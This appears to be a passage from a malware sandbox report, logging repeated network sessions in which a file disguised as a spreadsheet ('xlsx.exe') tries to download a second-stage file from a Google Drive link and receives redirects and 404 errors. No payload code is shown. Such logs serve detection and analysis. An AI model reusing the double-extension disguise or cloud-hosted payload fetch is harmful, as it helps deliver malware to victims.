                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-sIQsjuBS7kXdZycCF__4iA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2024-12-16 17:05:53 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 59 36 67 4b 30 46 62 68 6b 48 71 4a 6d 73 5a 71 4e 7a 55 59 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IY6gK0FbhkHqJmsZqNzUYw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.649888172.217.19.1744435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:06:05 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:06:06 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:06:05 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-WuPG0OHLsll6lBQfPdj2oQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.649894142.250.181.14435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:06:07 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:06:08 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC78hZ8vB7uaRS0PlP3iyi3CD-5-RkxIfCt2uvNptsoSiYbQG7QrUNUu0GsYovkTm2wC
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:06:08 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-7amad5-KjK-4UpjSGr5GEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2024-12-16 17:06:08 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 34 58 52 45 6e 46 65 54 57 38 41 75 69 51 75 6b 6e 46 59 49 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="f4XREnFeTW8AuiQuknFYIg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.649922172.217.19.1744435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:06:20 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:06:21 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:06:21 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-Y5qRPOmoEoid2Dg2a0VOlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.649932142.250.181.14435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:06:23 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:06:24 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC6RcJKxOcZ8kVuxTP6nHEOVSCpVeF7qhjsc4seXpcbgwBUOQR6fY5oUDMEKR-h0w8_J
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:06:24 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-2Jas3iTkHt7nF5dB3sLULA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2024-12-16 17:06:24 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 6f 4b 57 41 76 39 4f 48 41 45 75 75 71 57 30 55 55 67 69 61 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eoKWAv9OHAEuuqW0UUgiaQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.649956172.217.19.1744435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:06:36 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:06:37 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:06:37 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-6EAxgqfqluP2ZDuFnhgSPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.649963142.250.181.14435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:06:39 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:06:40 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC5rPh166RMBB6xpz6w9niqgzREj2_SB50KwPB0eZ8B9vUd3N2DS24KTG5jiHA6MVSxa
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:06:39 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-Ef0-Lv55KyzmQgf7KTlyBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2024-12-16 17:06:40 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 51 46 5a 50 74 74 6c 5f 32 68 32 31 76 68 74 5a 4a 50 65 6b 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NQFZPttl_2h21vhtZJPekg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.649993172.217.19.1744435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:06:51 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:06:52 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:06:52 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-0F28TuY2YD-gnTJiEM22SA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
